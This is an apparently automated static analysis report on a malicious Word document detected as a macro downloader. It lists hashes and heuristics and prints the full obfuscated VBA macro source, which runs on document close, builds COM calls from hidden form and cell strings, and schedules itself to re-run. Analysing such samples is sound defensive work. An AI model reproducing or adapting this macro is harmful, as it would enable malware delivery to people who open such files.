Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d5dd63d1560d4ec3…

MALICIOUS

Office (OOXML)

Size: 83.2 KB
Created: 2021-01-29 10:38:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-02-09
MD5: 57eeeb84020fed7a3a6889f6756baded
SHA-1: 2b0ad60dcc34064781057f3fcfdc48810af4124f
SHA-256: d5dd63d1560d4ec30642c5b6c489980e93be1a0da160961582e4f784b86d5a5c
Risk score: 222

Heuristics (5)

  • ClamAV: Doc.Downloader.Valyria-10033915-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10033915-0
  • VBA project inside OOXML [medium, 2 related findings] OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Matched line in script:
    Set oa = CreateObject(UserForm1.o4 & UserForm1.bp)
  • CallByName call [high] OLE_VBA_CALLBYNAME
    Matched line in script:
    Set sv4 = CallByName(oa.Workbooks, UserForm1.ie & UserForm1.nz, 1, UserForm2.ComboBox1, , , , UserForm1.wb)
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 7235 bytes
SHA-256: b0184b07a7fff6824b3b4ddfcb04ea9e7dab58a5ddb79d10090056b9595c8cd3
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Public gf, dq, a1, spw, n6, oa, it, pf, x, hl, aa, dx, ia, kt, f1, y66

Sub Document_Close()

dz

mh = UserForm2.ComboBox20

End Sub

Sub dz()

On Error Resume Next

UserForm2.ComboBox1.ListIndex = 5

Set oa = CreateObject(UserForm1.o4 & UserForm1.bp)

oa.DisplayAlerts = False

qi = 1301

jo = 0

Err.Number = 0

While qi <> 0 And jo < 32

Set sv4 = CallByName(oa.Workbooks, UserForm1.ie & UserForm1.nz, 1, UserForm2.ComboBox1, , , , UserForm1.wb)

qi = Err.Number

jo = jo + 16

Wend

If qi <> 0 Then

q9 = UserForm2.ComboBox23

ErrHandler:

vp = CallByName(Application, UserForm1.k8 & UserForm1.ay, 2)

If vp <> False Then

Set ja = CreateObject(UserForm1.qh & UserForm1.k5)

CallByName ja.Documents, UserForm1.ie & UserForm1.nz, 1, ActiveDocument.FullName, , True

lx = UserForm2.ComboBox28

CallByName ja, UserForm1.ujr & UserForm1.g8, 1, Now + TimeSerial(0, 0, 2), UserForm1.kj & UserForm1.pb & "dz"

Else

CallByName Application, UserForm1.ujr & UserForm1.g8, 1, Now + TimeSerial(0, 0, 17), UserForm1.kj & UserForm1.pb & "dz"

End If

oa.Quit

Exit Sub

End If

Dim w

Set w = oa.sheets(1)

v9 = "'"

y66 = oa.sheets(5).Cells(1, 1)

e8 = UserForm2.ComboBox27

If Len(y66) < 1 Then

If oa.ActiveWorkbook.Title <> "Google" Then

GoTo ErrHandler

dy = UserForm2.ComboBox9

Else

lg = UserForm2.ComboBox21

Exit Sub

End If

End If

g6 = oa.sheets(1).Cells(24, 12).Value

e1 = w.Cells(52, 11).Value

hl = oa.sheets(1).Cells(123, 18).Value

aa = oa.sheets(2).Cells(148, 17).Value

n6 = oa.sheets(2).Cells(113, 7).Value

p3 = UserForm2.ComboBox7

wv = oa.sheets(2).Cells(24, 42).Value

pd = oa.sheets(1).Cells(36, 34).Value

cp = oa.sheets(3).Cells(118, 4).Value

i0 = oa.sheets(2).Cells(101, 23).Value

m2 = oa.sheets(1).Cells(138, 35).Value

ia = oa.sheets(2).Cells(126, 10).Value

it = w.Cells(74, 42).Value

x = oa.sheets(3).Cells(62, 30).Value

r7 = oa.sheets(3).Cells(38, 31).Value

fd = UserForm2.ComboBox12

mn = oa.sheets(2).Cells(148, 40).Value

he = UserForm2.ComboBox20

dx = oa.sheets(1).Cells(42, 24).Value

bu = w.Cells(149, 47).Value

gg = UserForm2.ComboBox5

op = oa.sheets(2).Cells(145, 35).Value

gf = oa.sheets(3).Cells(53, 56).Value

os = oa.sheets(3).Cells(93, 33).Value

b9 = w.Cells(65, 24).Value

pf = oa.sheets(3).Cells(22, 10).Value

dq = oa.sheets(3).Cells(140, 55).Value

h1 = UserForm2.ComboBox19

gx = oa.sheets(3).Cells(56, 26).Value

tf3 = oa.sheets(2).Cells(149, 44).Value

f7 = UserForm2.ComboBox6

f1 = ""

Set Sh1 = oa.sheets(4)

rh = 1

np = UserForm2.ComboBox25

le = True

p9 = UserForm2.ComboBox23

While le

t = Sh1.Cells(rh, 1).Value

If Len(t) < 1 Then

le = False

Else

f1 = f1 & t

End If

rh = rh + 1

Wend

a3 = CallByName(oa, m2, 2)

dd = UserForm2.ComboBox11

UserForm1.r6.Value = pd & a3 & op

o8 = UserForm2.ComboBox7

w1 = UserForm2.ComboBox24

fy = UserForm2.ComboBox28

UserForm1.iob.Value = e1

hn = UserForm2.ComboBox15

CallByName CreateObject(tf3), b9, 1, UserForm1.r6, bu, UserForm1.iob

r = UserForm2.ComboBox8

Set h9 = CreateObject(g6)

ov = UserForm2.ComboBox27

Set lr = CallByName(h9, wv, 2)

Set tfp = CallByName(lr, gx, 1)

jw = UserForm2.ComboBox18

Set x = CallByName(h9, x, 2)

Set spw = h9

UserForm5.ComboBox1 = "zph"

Set gf = CallByName(kt, gf, 2)

oy = UserForm2.ComboBox12

pf = CallByName(gf, pf, 2)

ro = UserForm2.ComboBox9

UserForm1.ph.Value = os & cp

UserForm3.ComboBox1 = i0

UserForm1.ph.Value = r7

UserForm4.ComboBox1 = UserForm3.ComboBox1

UserForm3.ComboBox1 = pf

h9 = ma

sv4 = l2

w = c2

lr = l8

tfp = i7

kd = UserForm2.ComboBox12

x = hk

hl = rd

aa = el

kt = ld

gf = ji

cl = UserForm2.ComboBox20

ef = UserForm2.ComboBox20

spw = lk

DoEvents

CallByName oa, mn, 1

oa = yi

hp = UserForm2.ComboBox25

c3 = UserForm2.ComboBox23

End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{AA8E5D02-2B68-4D54-B866-3987E8390B18}{7A08AD09-F346-4EE1-824E-2EC2DA99146D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{F772E07B-D87B-4C06-902E-5E516F085D9A}{D1E7D319-1078-46D0-8514-6C31523AFEDB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 
 

 bg = UserForm2.Controls.Count - 1
 
 
 
 

 om = ""
 For jc = 1 To bg Step 2
 om = om & UserForm2.Controls.Item(jc)
 Next

 ComboBox1.AddItem "f8"
 ComboBox1.AddItem "zg"

hw = UserForm2.ComboBox20

 ComboBox1.AddItem "ei"
 ComboBox1.AddItem "ed"
 ComboBox1.AddItem "i3"
 ComboBox1.AddItem om
 ComboBox1.AddItem "gz"

fj = UserForm2.ComboBox14

 
 
 
 
 
 

oo = UserForm2.ComboBox11

 
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{91D9ADBA-F64E-4158-A279-DFB482AB0959}{17DAACFE-6B1C-46F5-84D4-D1279B7219DC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.gf, ActiveDocument.it, VbMethod, 1, ActiveDocument.pf

pe = UserForm2.ComboBox11

 CallByName ActiveDocument.gf, ActiveDocument.dq, VbMethod, UserForm1.ph.Value
End Sub

 

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{C6E2B6B1-D6D9-41AA-A58A-624099BCB16E}{E0F480B5-BBE7-4CFA-BB82-6F59426D3EAD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.spw, ActiveDocument.n6, VbMethod, UserForm1.ph.Value, ActiveDocument.f1, ActiveDocument.y66
End Sub

 

Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{530EB92D-967B-4284-B0CF-216C9B5626C4}{FB1E2BBE-3392-475A-89DE-A702E41BA958}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 Set ActiveDocument.hl = CallByName(ActiveDocument.x, ActiveDocument.hl, VbGet)
 Set ActiveDocument.aa = CallByName(ActiveDocument.hl, ActiveDocument.aa, VbGet)
 Set ActiveDocument.kt = CallByName(ActiveDocument.aa, ActiveDocument.dx, VbMethod, ActiveDocument.ia)
End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 51200 bytes
SHA-256: 5db8f30ccae49c184df1f757726b325c998ec1ed6752b5bd0018d63af6a7ef7d
Detection
ClamAV: Doc.Downloader.Valyria-10033915-0
Obfuscation or payload: unlikely